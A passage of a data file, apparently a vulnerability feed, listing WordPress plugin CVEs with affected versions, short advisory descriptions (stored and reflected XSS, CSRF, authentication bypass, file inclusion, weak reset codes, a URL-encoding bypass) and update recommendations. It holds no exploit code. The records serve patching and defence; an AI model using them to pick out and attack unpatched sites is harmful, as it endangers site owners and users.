version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-eventbrite-events\\\/tags\\\/1.7.3\\\/templates\\\/admin\\\/import-eventbrite-events-history.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-eventbrite-events\\\/tags\\\/1.7.3\\\/templates\\\/admin\\\/import-eventbrite-events-history.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-eventbrite-events\\\/tags\\\/1.7.3\\\/templates\\\/admin\\\/import-eventbrite-events-history.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-eventbrite-events\\\/tags\\\/1.7.3\\\/templates\\\/admin\\\/import-eventbrite-events-history.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207381%40import-eventbrite-events&new=3207381%40import-eventbrite-events&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207381%40import-eventbrite-events&new=3207381%40import-eventbrite-events&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f799db97-ca61-439d-94ec-a44270d1cd07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f799db97-ca61-439d-94ec-a44270d1cd07?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13504","slug":"shared-files","versionImpact":"1.7.42","versionEndExcluding":"1.7.43","description":"The Shared Files \u2013 Frontend File Upload Form & Secure File Sharing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via dfxp File uploads in all versions up to, and including, 1.7.42 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the dfxp file. This issue affects only Apache-based environments, where dfxp files are handled by default.","recommendation":"Update to version 1.7.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shared-files\\\/tags\\\/1.7.40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shared-files\\\/tags\\\/1.7.40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3231372%40shared-files%2Ftrunk&old=3229309%40shared-files%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3231372%40shared-files%2Ftrunk&old=3229309%40shared-files%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f4210a0-5448-4ff6-876a-37db4ad9b23a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f4210a0-5448-4ff6-876a-37db4ad9b23a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-23180","slug":"lead-form-builder","versionEndExcluding":"1.7.4","description":"The Contact Form & Lead Form Elementor Builder WordPress plugin before 1.7.4 doesn't have authorisation and nonce checks, which could allow any authenticated users, such as subscriber to update and change various settings","recommendation":"Update to version 1.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da87358a-3a72-4cf7-a2af-a266dd9b4290\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da87358a-3a72-4cf7-a2af-a266dd9b4290\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2670484\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2670484\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12457","slug":"chat-viber","versionImpact":"1.7.3","versionEndExcluding":"1.7.4","description":"The Chat Support for Viber \u2013 Chat Bubble and Chat Button for Gutenberg, Elementor and Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vchat' shortcode in all versions up to, and including, 1.7.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chat-viber\\\/tags\\\/1.7.2\\\/inc\\\/class-custom-buttons-templates.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chat-viber\\\/tags\\\/1.7.2\\\/inc\\\/class-custom-buttons-templates.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7834c0be-3051-4d97-928e-cf5295c93463?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7834c0be-3051-4d97-928e-cf5295c93463?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12825","slug":"custom-related-posts","versionImpact":"1.7.3","versionEndExcluding":"1.7.4","description":"The Custom Related Posts plugin for WordPress is vulnerable to unauthorized access & modification of data due to a missing capability check on three AJAX actions in all versions up to, and including, 1.7.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to search posts and link\/unlink relations.","recommendation":"Update to version 1.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226283%40custom-related-posts&new=3226283%40custom-related-posts&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226283%40custom-related-posts&new=3226283%40custom-related-posts&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40ba98a0-2193-4201-8370-34fd438dadb3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40ba98a0-2193-4201-8370-34fd438dadb3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4628","slug":"wp-ecommerce-paypal","versionEndExcluding":"1.7.4","description":"The Easy PayPal Buy Now Button WordPress plugin before 1.7.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ae719da-c43c-4b3a-bb8a-efa1de20100a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ae719da-c43c-4b3a-bb8a-efa1de20100a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8665","slug":"yith-custom-login","versionImpact":"1.7.3","versionEndExcluding":"1.7.4","description":"The YITH Custom Login plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.7.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0828a4a4-2dd5-4dff-8563-c81d6b24b949?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0828a4a4-2dd5-4dff-8563-c81d6b24b949?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-custom-login\\\/tags\\\/1.7.3\\\/yit-common\\\/yith-panel.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-custom-login\\\/tags\\\/1.7.3\\\/yit-common\\\/yith-panel.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150123%40yith-custom-login&new=3150123%40yith-custom-login&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150123%40yith-custom-login&new=3150123%40yith-custom-login&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150560%40yith-custom-login&new=3150560%40yith-custom-login&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150560%40yith-custom-login&new=3150560%40yith-custom-login&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6125","slug":"login-with-phone-number","versionImpact":"1.7.34","versionEndExcluding":"1.7.35","description":"The Login with phone number plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including 1.7.34. This is due to the plugin generating too weak a reset code, and the code used to reset the password has no attempt or time limit. This makes it possible for unauthenticated attackers to reset the password of arbitrary users by guessing a 6-digit numeric reset code.","recommendation":"Update to version 1.7.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/301a67a5-226c-413a-9198-66747d1b1fd3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/301a67a5-226c-413a-9198-66747d1b1fd3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104085\\\/login-with-phone-number#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104085\\\/login-with-phone-number#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12271","slug":"360deg-javascript-viewer","versionImpact":"1.7.29","versionEndExcluding":"1.7.30","description":"The 360 Javascript Viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ref\u2019 parameter in all versions up to, and including, 1.7.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.7.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/360deg-javascript-viewer\\\/trunk\\\/includes\\\/class-jsv-360-parser.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/360deg-javascript-viewer\\\/trunk\\\/includes\\\/class-jsv-360-parser.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/360deg-javascript-viewer\\\/trunk\\\/includes\\\/class-jsv-360-parser.php#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/360deg-javascript-viewer\\\/trunk\\\/includes\\\/class-jsv-360-parser.php#L162\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206400\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206400\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12b4e363-248f-469a-a958-0b1ec5c6e37f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12b4e363-248f-469a-a958-0b1ec5c6e37f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13452","slug":"contact-form-by-supsystic","versionImpact":"1.7.29","versionEndExcluding":"1.7.30","description":"The Contact Form by Supsystic plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.29. This is due to missing or incorrect nonce validation on a saveAsCopy function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-by-supsystic\\\/tags\\\/1.7.29\\\/modules\\\/forms\\\/models\\\/forms.php#L933\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-by-supsystic\\\/tags\\\/1.7.29\\\/modules\\\/forms\\\/models\\\/forms.php#L933\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3267149\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3267149\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2dbf510-d99f-4918-8462-66696b68003c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2dbf510-d99f-4918-8462-66696b68003c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4302","slug":"stop-user-enumeration","versionImpact":"1.7.2","versionEndExcluding":"1.7.3","description":"The Stop User Enumeration WordPress plugin before version 1.7.3 blocks REST API \/wp-json\/wp\/v2\/users\/ requests for non-authorized users. However, this can be bypassed by URL-encoding the API path.","recommendation":"Update to version 1.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19f67d6e-4ffe-4126-ac42-fb23c5017a3e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19f67d6e-4ffe-4126-ac42-fb23c5017a3e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11641","slug":"vikbooking","versionImpact":"1.7.2","versionEndExcluding":"1.7.3","description":"The VikBooking Hotel Booking Engine & PMS plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.2. This is due to missing or incorrect nonce validation on the 'save' function. This makes it possible for unauthenticated attackers to change plugin access privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Successful exploitation allows attackers with subscriber-level privileges and above to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225861\\\/vikbooking\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225861\\\/vikbooking\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eb6611d-7a4b-4ca8-b9cc-c156437e89b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eb6611d-7a4b-4ca8-b9cc-c156437e89b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3673","slug":"web-directory-free","versionImpact":"1.7.2","versionEndExcluding":"1.7.3","description":"The Web Directory Free WordPress plugin before 1.7.3 does not validate a parameter before using it in an include(), which could lead to Local File Inclusion issues.","recommendation":"Update to version 1.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e8930cb-e176-4406-a43f-a6032471debf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e8930cb-e176-4406-a43f-a6032471debf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4364","slug":"qi-addons-for-elementor","versionImpact":"1.7.2","versionEndExcluding":"1.7.3","description":"The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's button widgets in all versions up to, and including, 1.7.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/061ada09-932f-4d2c-aa9e-c53f1d711c85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/061ada09-932f-4d2c-aa9e-c53f1d711c85?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/tags\\\/1.7.0\\\/inc\\\/shortcodes\\\/info-button\\\/class-qiaddonsforelementor-info-button-shortcode.php#L696\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/tags\\\/1.7.0\\\/inc\\\/shortcodes\\\/info-button\\\/class-qiaddonsforelementor-info-button-shortcode.php#L696\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/tags\\\/1.7.0\\\/inc\\\/shortcodes\\\/button\\\/class-qiaddonsforelementor-button-shortcode.php#L1253\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/tags\\\/1.7.0\\\/inc\\\/shortcodes\\\/button\\\/class-qiaddonsforelementor-button-shortcode.php#L1253\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096634%40qi-addons-for-elementor%2Ftrunk&old=3092106%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096634%40qi-addons-for-elementor%2Ftrunk&old=3092106%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file21\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4887","slug":"qi-addons-for-elementor","versionImpact":"1.7.2","versionEndExcluding":"1.7.3","description":"The Qi Addons For Elementor plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 1.7.2 via the 'behavior' attributes found in the qi_addons_for_elementor_blog_list shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include remote files on the server, resulting in code execution. Please note that this requires an attacker to create a non-existent directory or target an instance where file_exists won't return false with a non-existent directory in the path, in order to successfully exploit.","recommendation":"Update to version 1.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/284daad9-d31e-4d29-ac15-ba293ba9640d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/284daad9-d31e-4d29-ac15-ba293ba9640d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096634\\\/qi-addons-for-elementor\\\/trunk\\\/inc\\\/admin\\\/helpers\\\/helper.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096634\\\/qi-addons-for-elementor\\\/trunk\\\/inc\\\/admin\\\/helpers\\\/helper.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5799","slug":"cm-pop-up-banners","versionImpact":"1.7.2","versionEndExcluding":"1.7.3","description":"The CM Pop-Up Banners for WordPress plugin before 1.7.3 does not sanitise and escape some of its popup fields, which could allow high privilege users such as Contributors to perform Cross-Site Scripting attacks.","recommendation":"Update to version 1.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ee3023a-541c-40e6-8d62-24b4b110633c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ee3023a-541c-40e6-8d62-24b4b110633c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5150","slug":"login-with-phone-number","versionImpact":"1.7.26","versionEndExcluding":"1.7.27","description":"The Login with phone number plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.7.26. This is due to the 'activation_code' default value is empty, and the not empty check is missing in the 'lwp_ajax_register' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user email. The vulnerability is patched in version 1.7.26, but there is an issue in the patch that causes the entire function to not work, and this issue is fixed in version 1.7.27.","recommendation":"Update to version 1.7.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf34eb9f-f6e9-4a7a-8459-c86f9fa3dad8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf34eb9f-f6e9-4a7a-8459-c86f9fa3dad8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.7.25\\\/login-with-phonenumber.php#L4183\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.7.25\\\/login-with-phonenumber.php#L4183\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.7.25\\\/login-with-phonenumber.php#L4220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.7.25\\\/login-with-phonenumber.php#L4220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.7.25\\\/login-with-phonenumber.php#L4241\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.7.25\\\/login-with-phonenumber.php#L4241\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090625\\\/login-with-phone-number\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090625\\\/login-with-phone-number\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090754\\\/login-with-phone-number#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090754\\\/login-with-phone-number#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12427","slug":"multi-step-form","versionImpact":"1.7.23","versionEndExcluding":"1.7.24","description":"The Multi Step Form plugin for WordPress is vulnerable to unauthorized limited file upload due to a missing capability check on the fw_upload_file AJAX action in all versions up to, and including, 1.7.23. This makes it possible for unauthenticated attackers to upload limited file types such as images.","recommendation":"Update to version 1.7.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-step-form\\\/tags\\\/1.7.22\\\/includes\\\/lib\\\/msf-shortcode.class.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-step-form\\\/tags\\\/1.7.22\\\/includes\\\/lib\\\/msf-shortcode.class.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-step-form\\\/tags\\\/1.7.22\\\/includes\\\/lib\\\/msf-shortcode.class.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-step-form\\\/tags\\\/1.7.22\\\/includes\\\/lib\\\/msf-shortcode.class.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219723%40multi-step-form&new=3219723%40multi-step-form&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219723%40multi-step-form&new=3219723%40multi-step-form&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0a31fee-ccc2-4c3b-b198-6cb750188113?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0a31fee-ccc2-4c3b-b198-6cb750188113?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3669","slug":"web-directory-free","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The Web Directory Free WordPress plugin before 1.7.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c37c9a9-1424-427a-adc7-c2336a47e9cf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c37c9a9-1424-427a-adc7-c2336a47e9cf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13622","slug":"woo-addon-uploads","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The File Uploads Addon for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.7.1 via the 'uploads' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads directory which can contain file attachments uploaded by customers.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-addon-uploads\\\/trunk\\\/includes\\\/class-wau-front-end.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-addon-uploads\\\/trunk\\\/includes\\\/class-wau-front-end.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-addon-uploads\\\/trunk\\\/woocommerce-addon-uploads.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-addon-uploads\\\/trunk\\\/woocommerce-addon-uploads.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f86bb77-7194-4a8d-b862-6f04d850017b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f86bb77-7194-4a8d-b862-6f04d850017b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13395","slug":"threepress","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The Threepress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'threepress' shortcode in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/threepress\\\/tags\\\/1.7.1\\\/threepress.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/threepress\\\/tags\\\/1.7.1\\\/threepress.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/threepress\\\/tags\\\/1.7.2\\\/threepress.php#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/threepress\\\/tags\\\/1.7.2\\\/threepress.php#L263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7021881-2ce9-4c8b-bcfa-6886cce649d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7021881-2ce9-4c8b-bcfa-6886cce649d9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
